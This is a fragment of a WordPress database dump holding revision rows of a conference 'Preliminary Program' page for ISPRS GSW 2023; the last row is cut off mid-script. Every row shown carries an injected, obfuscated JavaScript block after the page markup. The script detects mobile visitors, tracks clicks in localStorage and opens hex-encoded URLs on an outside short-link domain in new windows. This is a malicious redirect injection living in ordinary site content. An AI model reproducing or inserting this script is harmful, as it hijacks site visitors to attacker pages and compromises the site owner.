21:09:44','',2669,'https://gsw2023.com/?p=4761',0,'revision','',0),
(4762,4,'2023-06-23 21:12:46','2023-06-23 21:12:46','[vc_row][vc_column][vc_column_text]\n<h3><strong>ISPRS GSW’2023 - Preliminary Program</strong></h3>\n[/vc_column_text][vc_single_image image=\"4745\" img_size=\"1900x800\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Preliminary Program','','inherit','closed','closed','','2669-autosave-v1','','','2023-06-23 21:12:46','2023-06-23 21:12:46','',2669,'https://gsw2023.com/?p=4762',0,'revision','',0),
(4763,4,'2023-06-23 21:10:13','2023-06-23 21:10:13','[vc_row][vc_column][vc_column_text]\r\n<h2><strong>ISPRS GSW’2023 - Preliminary Program</strong></h2>\r\n[/vc_column_text][vc_single_image image=\"4745\" img_size=\"1900x800\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','','','inherit','closed','closed','','2669-revision-v1','','','2023-06-23 21:10:13','2023-06-23 21:10:13','',2669,'https://gsw2023.com/?p=4763',0,'revision','',0),
(4764,4,'2023-06-23 21:10:39','2023-06-23 21:10:39','[vc_row][vc_column][vc_column_text]\r\n<h3><strong>ISPRS GSW’2023 - Preliminary Program</strong></h3>\r\n[/vc_column_text][vc_single_image image=\"4745\" img_size=\"1900x800\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge 